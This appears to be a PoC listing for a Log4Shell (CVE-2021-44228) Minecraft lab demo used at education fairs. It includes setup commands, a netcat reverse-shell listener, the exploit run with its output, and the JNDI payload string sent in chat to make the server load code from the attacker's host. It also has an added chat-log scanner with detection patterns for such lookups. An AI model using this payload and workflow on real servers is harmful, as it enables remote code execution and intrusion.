
CVE-2021-44228 PoC — Apache Log4j Code Issue Vulnerability

Source
Associated Vulnerability
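Title: Apache Log4j Code Issue Vulnerability (CVE-2021-44228)
Description: Apache Log4j is a Java-based open-source logging tool from the Apache Software Foundation. Apache Log4j has a code issue vulnerability: an attacker can craft a request and send it to a server that uses Apache Log4j, and remote code execution is triggered when that request is written to the log.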
Description
Log4Shell (CVE-2021-44228) minecraft demo. Used for education fairs
Readme
# Log4Shell (CVE-2021-44228) minecraft demo
This demo is used at education fairs to give potential future students an idea of the cybersecurity department at HTL Villach and of how everyday applications can be exploited.


**Note:** This entire demo uses Minecraft 1.8.8
## Attacker
The attacker in this scenario uses the PoC by kozmer: https://github.com/kozmer/log4j-shell-poc
All credit belongs to them. 
**Note:** All commands need to be executed in attacker/

#### Requirements:
```bash
pip install -r requirements.txt
```
#### Usage:


* Start a netcat listener to accept the reverse shell connection.<br>
```bash
nc -lvnp 9001
```
* Launch the exploit.<br>
**Note:** For this to work, the extracted Java archive has to be named `jdk1.8.0_20` and be in the same directory.
```console
$ python3 poc.py --userip <ip of docker-host> --webport 8000 --lport 9001

[!] CVE: CVE-2021-44228
[!] Github repo: https://github.com/kozmer/log4j-shell-poc

[+] Exploit java class created success
[+] Setting up fake LDAP server

[+] Send me: ${jndi:ldap://<ip of docker-host>:1389/a}

Listening on 0.0.0.0:1389
```


This script sets up the HTTP server and the LDAP server for you, and it also creates the payload string that you paste into the vulnerable parameter. After this, if everything went well, you should get a shell on the lport.

<br>

## Victim
On the victim instance we are using an outdated and therefore [vulnerable version of JDK (jdk1.8.0_20)](https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html).

#### Initial setup


To get our Minecraft server running we have to build our Docker image and run it.

**Note:** For a successful build you need to obtain your own copy of the Minecraft Vanilla 1.8.8 Server *(can't be shared because of Mojang's EULA)*.
A possible source could be [MCVERSIONS.NET](https://mcversions.net/download/1.8.8).

After obtaining the file, save it in `victim/` as `server.jar`.

```bash
# Build from victim/, where the Dockerfile and server.jar are located
cd victim/
docker build . -t minecraft-demo
```

#### Running the vulnerable server
Run the vulnerable Minecraft server we just built using Docker:
```
docker run --name vulnerable-server -p 25565:25565 minecraft-demo
```
It's likely that your container freezes or gets stuck after exploitation. In that case you can kill it using the following command:
```
docker kill vulnerable-server
```

#### Exploiting the server

To exploit the vulnerability, simply send the string provided by *poc.py* in the game chat.
```
${jndi:ldap://<ip of docker-host>:1389/a}
```
![image](https://github.com/felixslama/log4shell-minecraft-demo/assets/79058712/b3cc9c19-ca14-456c-bf7f-7246bb6adf58)
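
Defender-side counterpart to the step above, as an added example that is not part of the original README or of kozmer's PoC: a scanner that flags Log4j lookup syntax in Minecraft chat log lines and extracts the callback endpoint to hunt for in egress logs. The log line format, the sample lines and the function name `scan_chat_log` are assumptions made for this example, and it expects a log that records chat text verbatim (a patched server or an upstream proxy), since a vulnerable Log4j may substitute the lookup before writing the line.

```python
import re

# Assumed Minecraft 1.8.x chat line: "[12:00:01] [Server thread/INFO]: <Steve> hello"
CHAT_RE = re.compile(
    r"^\[(?P<time>[\d:]{8})\] \[[^\]]*\]: <(?P<player>[^>]+)> (?P<msg>.*)$"
)
# Explicit JNDI lookup with a network endpoint, as in the string poc.py prints
JNDI_RE = re.compile(
    r"\$\{jndi:(?P<scheme>[a-z]+)://(?P<host>[^:/}\s]+)(?::(?P<port>\d+))?",
    re.IGNORECASE,
)
# Any other lookup syntax: player chat has no legitimate use for "${"
LOOKUP_RE = re.compile(r"\$\{")

# Constructed sample log (192.0.2.0/24 is a documentation address range)
SAMPLE_LOG = [
    "[12:00:01] [Server thread/INFO]: Steve joined the game",
    "[12:00:07] [Server thread/INFO]: <Steve> hello everyone",
    "[12:00:15] [Server thread/INFO]: <Alex> ${jndi:ldap://192.0.2.10:1389/a}",
    "[12:00:21] [Server thread/INFO]: <Alex> ${jndi:ldap://192.0.2.10/a}",
    "[12:00:30] [Server thread/INFO]: <Steve> price is ${placeholder:value}",
]


def scan_chat_log(lines):
    """Return one finding per chat line that carries Log4j lookup syntax."""
    findings = []
    for lineno, line in enumerate(lines, 1):
        chat = CHAT_RE.match(line.rstrip("\n"))
        if not chat:
            continue  # not player chat (joins, server messages, stack traces)
        finding = {"line": lineno, "time": chat["time"], "player": chat["player"]}
        jndi = JNDI_RE.search(chat["msg"])
        if jndi:
            # Callback endpoint: what to search for in firewall, DNS or proxy logs
            finding.update(severity="high", scheme=jndi["scheme"].lower(),
                           host=jndi["host"],
                           port=int(jndi["port"]) if jndi["port"] else None)
        elif LOOKUP_RE.search(chat["msg"]):
            finding.update(severity="review")  # lookup syntax, no endpoint parsed
        else:
            continue
        findings.append(finding)
    return findings


if __name__ == "__main__":
    for f in scan_chat_log(SAMPLE_LOG):
        print(f)
```

A `high` finding gives the player name and time to correlate with outbound connections from the server host to the extracted endpoint; a `review` finding is a line to inspect by hand.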
File Snapshot

```
[4.0K] /data/pocs/6963bb0571419f1998cec29856192d6dda3c7412
├── [4.0K] attacker
│   ├── [4.1K] poc.py
│   ├── [  17] requirements.txt
│   └── [4.0K] target
│       ├── [1.8M] log4shell-1.0-SNAPSHOT.war
│       └── [ 41M] marshalsec-0.0.3-SNAPSHOT-all.jar
├── [1.0K] LICENSE
├── [2.6K] README.md
└── [4.0K] victim
    └── [ 295] Dockerfile

3 directories, 7 files
```